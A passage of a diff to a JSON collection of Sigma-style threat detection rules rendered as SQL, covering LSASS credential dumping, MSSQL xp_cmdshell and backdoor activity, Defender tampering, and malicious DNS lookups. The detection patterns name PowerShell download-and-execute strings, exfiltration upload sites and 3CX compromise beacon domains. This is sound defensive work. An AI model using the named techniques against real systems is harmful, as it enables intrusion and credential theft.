(Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" 
+ ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_target.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "status": "experimental", + "description": "Detects windows error reporting event where the process that crashed is lsass. 
This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Antivirus products" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", - "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the 
wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "test", + "description": "Detects backup catalog deletions", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1055" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE 
'%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_susp_backup_delete.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "status": "experimental", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE 
'%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Unknown" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "WMI Event Subscription", - "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "status": "test", - "description": "Detects creation of WMI event subscription persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "status": "experimental", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.persistence" ], "falsepositives": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Legitimate use of the feature by administrators (rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID IN ('19', '20', '21')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_event_subscription.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE 
'\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", - "id": "db809f10-56ce-4420-8c86-d6a7d793c79c", - "status": "test", - "description": "Detects raw disk access using uncommon tools, which could indicate possible defense evasion attempts", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1006" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE NOT ((Device LIKE '%floppy%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\uus\\\\%' ESCAPE '\\')) OR (ProcessId = '4') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName IN ('System', 'Registry')) OR (NewProcessName LIKE '%\\\\Keybase\\\\upd.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SystemApps\\\\Microsoft.Windows.StartMenuExperienceHost%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\StartMenuExperienceHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\WindowsUpdateBox.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\resources\\\\app\\\\git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\HostMetadata\\\\NVMEHostmetadata.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Executables\\\\SSDUpdate.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects corrupted packets sent to the MSMQ service. 
Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": 
"f356a9c4-effd-4608-bbf8-408afd5cd006", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", + "title": "Windows Defender 
Malware Detection History Deletion", + "id": "2afe6582-e149-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "author": "Cian Heasley", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Deletion of Defender malware detections history for legitimate reasons" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1013')" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_history_delete.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", + "description": "Detects the restoration of files from the defender quarantine", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' 
OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' 